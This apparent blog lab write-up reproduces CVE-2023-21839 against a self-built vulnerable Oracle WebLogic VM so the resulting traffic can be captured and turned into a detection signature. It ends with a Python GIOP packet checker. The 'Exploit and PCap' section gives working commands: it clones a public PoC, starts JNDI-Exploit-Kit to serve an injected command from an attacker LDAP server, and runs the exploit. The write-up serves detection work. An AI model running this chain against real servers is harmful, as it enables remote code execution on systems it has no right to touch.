⭕ Emulating and Exploiting Oracle WebLogic Server for PCap Analysis (CVE-2023-21839)

The purpose of this is not to explain how CVE-2023-21839 works, but rather how to identify it via web packet. This was a case where I, personally, found testing the PoC code, getting a packet, and looking at that to be more informative than just looking at the code itself. TL;DR Lemme see the packets.
vulnerabilities
cybersecurity
Author

h0wdy

Published

April 21, 2023

Why?

This should be informative regarding some WebLogic Server specifics if (when) the time comes to emulate its environment, and it doubles as a reference for testing a PoC and generating some packets.

References

These are the materials I found specific to this exploit; I’ll provide other helpful links as I go along.

Virtual Machine (VM) Setup

OS (Windows 10)

  1. Install a hypervisor: I use VirtualBox
  2. Download a Windows ISO
  3. Install and Setup Windows
    • There are a ton of online tutorials on both step 1 and 2; however, you’re probably going to want your Windows VM to have the following:
      1. 8000 MB base memory
      2. at least 2 cores (the more the better) → I used 6
      3. A Virtual Storage size of at least 40GB → I used 50GB
  4. Take a snapshot of your fresh Windows VM

Networking

Now we need to set up a virtual network connection between our host (your computer running the hypervisor) and client (your new VM) machine.

  1. Shut down the VM if you haven’t already.
  2. Make a new interface for connecting to the VM by going to the Host Network Manager: File → Host Network Manager
  3. Click Create in the top left corner
    • This should make a network titled vboxnet0 or something like that
  4. Then click Enable for the DHCP Server option all the way to the right.

host_net_manager.png
  5. Now we just need to enable our new adapter by going to Settings → Network → Adapter 2
  6. Click Enable Network Adapter
  7. Then for Attached to: choose Host-only Adapter
  8. Make sure the Name of your adapter matches the one you’ve just created in the steps above.

gen_net_adapter_settings.png

Sanity check: you can make sure that everything is set up correctly on your Ubuntu host by running ifconfig; you should see a new NIC listed as vboxnet0, or whatever you chose to name it above.

Best Practices:

  • Snapshot, then snapshot again. No, but seriously; take a lot of snapshots of your VM.

VM Environment (Target)

LFG! General environment is ready to go.

In this case the vulnerable version of Oracle WebLogic only seems to be exploitable when set up with an earlier JDK, in this case jdk8u191 or earlier. I had little success with jdk8u191, so we’re setting up Oracle WebLogic with jdk8u181.

You will have to set up an account with Oracle first!

Java

  1. In your Windows VM download and install Java SE Development Kit 8u181

jdk_8u181_download.png
  2. Double-click the downloaded package to install it

Oracle WebLogic Server

Affected versions include: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

I tested the exploit on 12.2.1.3.0.

  1. Download Oracle WebLogic Server 12.2.1.3.0 (Generic)
  2. Take a snapshot of your VM.
  3. Download 7-zip (for Windows x64)
    • You’ll need this for unpacking the WebLogic Server jar file.
  4. Take a snapshot of your VM.
  5. This step-by-step exercise is what I used, and what the writeup used:
  6. Take a snapshot of your VM.

Troubleshooting

I ended up having some trouble with just the first step of the Oracle WebLogic installer process: I couldn’t seem to get the .ng.cmd file to run because my machine couldn’t find a proper JAVA_HOME. Here’s how I worked around that:

  1. Open Windows Command Prompt:
    • Home (Windows key) → Command Prompt → Run as Administrator
  2. set JAVA_HOME=C:\Program Files\Java\jdk1.8.0_181 (or whatever your path is to your jdk)
    • NOTE: Despite it complaining about the jreLoc (jre location), it really wants the JDK 🙄

JAVA_HOME_set.png
  3. Now you should be able to run .ng.cmd from your Command Prompt

run_ng_cmd.png
  4. Return to step 3 from the previous section.

Exploit Environment (Attacker)

You could go down the rabbit hole of Java dependencies (I tried), but easy mode = use the Go PoC!

Setup

  1. Install Go
  2. Clone the PoC repo (also attached below).

git clone https://github.com/4ra1n/CVE-2023-21839

4ra1n_CVE-2023-21839.zip

  3. Install the JNDI Exploit Kit
  4. Install Java
  5. Install Wireshark
    • On most Debian-based distros you should be able to just run: sudo apt install wireshark

Exploit and PCap

  1. Start your target WebLogic Server
    1. Home (Windows key) → Command Prompt → Run as Administrator
    2. Run startWebLogic.cmd, typically found at C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd
      • NOTE: You can check the target IP in the Windows VM by running ipconfig in the Command Prompt
  2. Start Wireshark (you may have to be admin)
  3. Begin monitoring on the adapter we made earlier: in my case vboxnet0
  4. Start JNDI-Exploit-Kit

java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C <command> -L <your locally hosted ldap server>:<port>

ex) java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C calc -L 192.168.1.10:1389

Oversimplified explanation of what this is doing: it serves an LDAP server that has our command (calc) ready for injection.

  5. Build the PoC

cd cmd; go build -o poc

  6. Run the PoC

./poc -ip <target ip> -port <target port (7001)> -ldap <your ldap server>

exploit_screen_cap.png
  7. Celebrate the calculator 🧮
  8. Stop Wireshark (it should have your PCap now, ready for analysis!)

Analysis

We can get a general understanding of what to look for, and how the exploit works via the writeup. In this case we know that our payload is going to target the weblogic IIOP/T3 protocol, and is also going to make a request for a ForeignOpaqueReference object. Taking a look at the PoC code can give us a better idea of how the resulting payload may actually appear going over the wire, but with limited experience looking at these kinds of packets it can be pretty hard to know for sure. As mentioned earlier, this is why we want to test the PoC, and get PCap from it.

PCap

Here’s the sample from when I ran the exploit:

pcap.zip

Sure enough, the signature details (ForeignOpaqueReference, and a call to GIOP) can be seen in its contents. Specifically, a rebind request for a Transparent Remote Method Invocation (TRMI) is made over GIOP for a ForeignOpaqueReference. This kind of activity is unique enough that a reliable signature could be made based on this information, and now we know what it looks like on the wire!

pcap_screenshot.png
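One way to turn the two markers above (a GIOP Request carrying "rebind" and "ForeignOpaqueReference") into a repeatable check, as an added example that is not part of the original post or the PoC repo: it parses the 12-byte GIOP header from each TCP payload in a classic libpcap capture and flags Request messages whose body contains both strings. It matches on substrings rather than decoding the CDR body, and make_giop_request only builds constructed test messages, not real exploit traffic.

```python
import struct

GIOP_REQUEST = 0  # GIOP message_type 0 = Request
# Strings the write-up names as the on-wire signature (substring match, not a CDR parse).
MARKERS = (b"rebind", b"ForeignOpaqueReference")

def parse_giop_header(payload):
    """Return (version, little_endian, msg_type, body_size) or None if not GIOP."""
    if len(payload) < 12 or payload[:4] != b"GIOP":
        return None
    major, minor, flags, msg_type = payload[4:8]
    little_endian = bool(flags & 0x01)  # GIOP 1.1+: flags bit 0 is the byte order
    size = struct.unpack("<I" if little_endian else ">I", payload[8:12])[0]
    return f"{major}.{minor}", little_endian, msg_type, size

def check_payload(payload):
    """Return a finding dict when a GIOP Request carries both markers, else None."""
    hdr = parse_giop_header(payload)
    if hdr is None or hdr[2] != GIOP_REQUEST:
        return None
    body = payload[12:12 + hdr[3]]
    if not all(m in body for m in MARKERS):
        return None
    return {"giop_version": hdr[0], "body_size": hdr[3],
            "markers": [m.decode() for m in MARKERS]}

def tcp_payloads(pcap_bytes):
    """Yield (dst_port, payload) for TCP segments in a classic libpcap file (Ethernet/IPv4 only)."""
    end = "<" if pcap_bytes[:4] in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1") else ">"
    off = 24  # skip the 24-byte global header
    while off + 16 <= len(pcap_bytes):
        caplen = struct.unpack(end + "I", pcap_bytes[off + 8:off + 12])[0]
        frame = pcap_bytes[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue  # not IPv4 over Ethernet, or not TCP
        tcp = frame[14 + (frame[14] & 0x0F) * 4:]  # skip Ethernet + IP header (IHL)
        data_off = (tcp[12] >> 4) * 4  # TCP data offset in 32-bit words
        yield struct.unpack("!H", tcp[2:4])[0], tcp[data_off:]

def scan_pcap(pcap_bytes):
    """Return [(dst_port, finding)] for every segment that matches; feed it the capture's bytes."""
    return [(port, f) for port, p in tcp_payloads(pcap_bytes) if (f := check_payload(p))]

def make_giop_request(body):
    """Constructed big-endian GIOP 1.2 Request around an arbitrary body; test data only."""
    return b"GIOP" + bytes([1, 2, 0, GIOP_REQUEST]) + struct.pack(">I", len(body)) + body
```

Run it against the capture with scan_pcap(open("capture.pcap", "rb").read()); a hit on destination port 7001 is the rebind the write-up describes.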